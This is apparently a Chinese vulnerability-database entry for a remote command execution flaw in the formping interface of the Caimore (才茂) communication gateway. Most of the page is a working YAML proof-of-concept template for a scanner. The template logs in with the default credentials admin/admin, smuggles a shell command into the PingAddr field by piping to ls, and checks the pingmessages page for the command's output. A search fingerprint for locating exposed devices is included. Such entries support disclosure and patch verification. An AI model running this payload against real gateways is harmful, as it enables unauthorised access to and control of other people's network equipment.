carmore-gateway-rce: 才茂通信网关formping 远程命令执行

日期: 2025-09-01 | 影响软件: carmore-gateway | POC: 已公开

漏洞描述

才茂通信网关 formping 接口存在远程命令执行漏洞,攻击者通过默认口令 admin/admin 登陆系统后通过命令可以获取服务器权限 app="CAIMORE-Gateway"

PoC代码[已公开]

id: carmore-gateway-rce

info:
  name: 才茂通信网关formping 远程命令执行
  author: zan8in
  severity: high
  verified: true
  description: |
    才茂通信网关 formping 接口存在远程命令执行漏洞,攻击者通过默认口令 admin/admin 登陆系统后通过命令可以获取服务器权限
    app="CAIMORE-Gateway"
  
rules:
  r0:
    request:
      method: POST
      path: /goform/formping
      headers:
        Authorization: Basic YWRtaW46YWRtaW4=
      body: |
        PingAddr=www.baidu.com%7Cls&PingPackNumb=1&PingMsg=
    expression: response.status == 200 && response.body.bcontains(b'window.parent.ialert')
  r1:
    request:
      method: GET
      path: /pingmessages
      headers:
        Authorization: Basic YWRtaW46YWRtaW4=
    expression: response.status == 200 && response.body.bcontains(b'var')&& response.body.bcontains(b'usr') && response.body.bcontains(b'tmp') && response.body.bcontains(b'sbin')
expression: r0() && r1()

相关漏洞推荐